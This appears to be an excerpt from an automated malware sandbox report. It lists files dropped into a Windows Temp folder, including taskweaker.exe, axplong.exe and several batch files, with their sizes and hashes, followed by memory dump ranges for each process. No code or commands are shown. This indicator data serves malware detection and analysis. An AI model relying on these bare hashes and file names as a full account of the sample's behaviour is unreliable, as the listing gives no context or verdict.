SHA5127faa4e18cc9d7d82cb8efe8494668e05f75ddd5a8c9c9a058b2246a786a60d7761168862220b70820b02f38f196cfb5f106db36cdcfd5a5a3f9dfd01654eb9ad
-
C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exeFilesize
5.8MB
MD56c149b39619395a8ba117a4cae95ba6f
SHA13ef8be98589745ecce5522dd871e813f69a7b71b
SHA256c43b64c78f6ccba5cfb7de13fc39d5cc43fad9a9f5e78799b34100ab69e5e4e8
SHA512866edae7858e7bfb82486e99b31550307de81fa732a3075b6e2ff0abcade5331be28bb14d894cdf5176dc907a45aaa1407b6d8c4295cc69b6d45516f319560a4
-
C:\Users\Admin\AppData\Local\Temp\6.exeFilesize
4.8MB
MD55bb3677a298d7977d73c2d47b805b9c3
SHA191933eb9b40281e59dd7e73d8b7dac77c5e42798
SHA25685eb3f6ba52fe0fd232f8c3371d87f7d363f821953c344936ab87728ba6a627f
SHA512d20f862e9fadb5ad12eddaae8c6ebbfa03d67d35c5ca272e185206eb256cd6a89c338ce608c992df715d36a3f1624a507dbe324a057bd412b87438f4a008f33d
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeFilesize
1.8MB
MD574567fb6c1a91b1fc4af041fd8d95a11
SHA11a248b15186b94f07c5e85fa771da48b1afa0bba
SHA2569a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446
SHA51218028b2bfd4eda27a95507a1f407791bcb88d17f91ec9ea48a53f01141562ce4580b12345cb22ebb81a976b1ff63d8c379f65bf4b1cd0d7c0d332f159b3dec08
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ins.batFilesize
1KB
MD50be4cbfa51fe5f8010e78553a28f2779
SHA1ae21783c148ae1443fa87a43b9b51cb0ab1a799b
SHA256cc56d197270cdf7c3b5c193ec5b3c63dd87b57b58f90571649f8f0e29a6f1a90
SHA512337a332eecb12cb065a09b3ae01e86802082c576b203ffd1a8270c69172036dc244ecffad1fba3de76d573c77f1315821a563d2a4aed73bfeb9e9bdf6107edfd
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1cf0kfmi.3tg.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.batFilesize
568B
MD5e861a08036b9eb5f216deb58e8a7934d
SHA15f12dd049df2f88d95f205a4adc307df78ac16ee
SHA256e8315164849216f4c670c13b008e063da2176efb5d08939caa321e39a33035eb
SHA5127ea2fd3b085bd4b3e27d4dda36e079ec8910173cc2b33ccd06698051eb7d5f2818ed9000761d1fc44e354c06d015feb16e77958dab8a3969a0cee2fd453ca0c9
-
\??\pipe\LOCAL\crashpad_2688_KHSUELCMRREWYWLCMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/884-272-0x0000000072E5E000-0x0000000072E5F000-memory.dmpFilesize
4KB
-
memory/884-49-0x00000000050F0000-0x000000000513C000-memory.dmpFilesize
304KB
-
memory/884-154-0x00000000053B0000-0x0000000005416000-memory.dmpFilesize
408KB
-
memory/884-44-0x0000000004E60000-0x0000000004E6A000-memory.dmpFilesize
40KB
-
memory/884-45-0x0000000006040000-0x0000000006658000-memory.dmpFilesize
6.1MB
-
memory/884-47-0x0000000005050000-0x0000000005062000-memory.dmpFilesize
72KB
-
memory/884-43-0x0000000004DB0000-0x0000000004E42000-memory.dmpFilesize
584KB
-
memory/884-42-0x0000000005470000-0x0000000005A16000-memory.dmpFilesize
5.6MB
-
memory/884-41-0x00000000002C0000-0x0000000000310000-memory.dmpFilesize
320KB
-
memory/884-46-0x00000000051F0000-0x00000000052FA000-memory.dmpFilesize
1.0MB
-
memory/884-40-0x0000000072E5E000-0x0000000072E5F000-memory.dmpFilesize
4KB
-
memory/884-48-0x00000000050B0000-0x00000000050EC000-memory.dmpFilesize
240KB
-
memory/1312-239-0x0000000008CE0000-0x0000000008D56000-memory.dmpFilesize
472KB
-
memory/1312-171-0x0000000000400000-0x0000000000470000-memory.dmpFilesize
448KB
-
memory/1312-240-0x0000000008C90000-0x0000000008CAE000-memory.dmpFilesize
120KB
-
memory/1424-216-0x0000000000400000-0x0000000000443000-memory.dmpFilesize
268KB
-
memory/1556-260-0x0000000002E80000-0x0000000002E81000-memory.dmpFilesize
4KB
-
memory/1556-262-0x0000000000270000-0x0000000000A8E000-memory.dmpFilesize
8.1MB
-
memory/1920-4-0x0000000000840000-0x0000000000CF1000-memory.dmpFilesize
4.7MB
-
memory/1920-3-0x0000000000840000-0x0000000000CF1000-memory.dmpFilesize
4.7MB
-
memory/1920-0-0x0000000000840000-0x0000000000CF1000-memory.dmpFilesize
4.7MB
-
memory/1920-17-0x0000000000840000-0x0000000000CF1000-memory.dmpFilesize
4.7MB
-
memory/1920-2-0x0000000000841000-0x000000000086F000-memory.dmpFilesize
184KB
-
memory/1920-1-0x0000000077496000-0x0000000077498000-memory.dmpFilesize
8KB
-
memory/2068-65-0x00000000017F0000-0x00000000017F1000-memory.dmpFilesize
4KB
-
memory/2068-67-0x00000000017F0000-0x00000000017F1000-memory.dmpFilesize
4KB
-
memory/2080-19-0x0000000000221000-0x000000000024F000-memory.dmpFilesize
184KB
-
memory/2080-488-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-521-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-520-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-172-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-248-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-21-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-20-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-519-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-301-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-518-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-512-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-481-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-471-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-18-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-243-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-470-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-469-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-451-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2080-242-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2284-274-0x00000000009F0000-0x0000000000EA1000-memory.dmpFilesize
4.7MB
-
memory/2284-300-0x00000000009F0000-0x0000000000EA1000-memory.dmpFilesize
4.7MB
-
memory/2660-429-0x00007FF648910000-0x00007FF648F46000-memory.dmpFilesize
6.2MB
-
memory/2660-458-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2660-459-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/2660-247-0x00007FF648910000-0x00007FF648F46000-memory.dmpFilesize
6.2MB
-
memory/3156-313-0x0000020F59740000-0x0000020F59752000-memory.dmpFilesize
72KB
-
memory/3156-314-0x0000020F59500000-0x0000020F5950A000-memory.dmpFilesize
40KB
-
memory/3592-428-0x0000000000520000-0x0000000000576000-memory.dmpFilesize
344KB
-
memory/3592-427-0x0000000000520000-0x0000000000576000-memory.dmpFilesize
344KB
-
memory/3892-515-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/3892-517-0x0000000000220000-0x00000000006D1000-memory.dmpFilesize
4.7MB
-
memory/4224-219-0x000000000A850000-0x000000000AD7C000-memory.dmpFilesize
5.2MB
-
memory/4224-218-0x000000000A150000-0x000000000A312000-memory.dmpFilesize
1.8MB
-
memory/4224-217-0x0000000008FB0000-0x0000000009000000-memory.dmpFilesize
320KB
-
memory/4224-66-0x0000000000400000-0x0000000000450000-memory.dmpFilesize
320KB
-
memory/5028-148-0x00000201D5E40000-0x00000201D5E62000-memory.dmpFilesize
136KB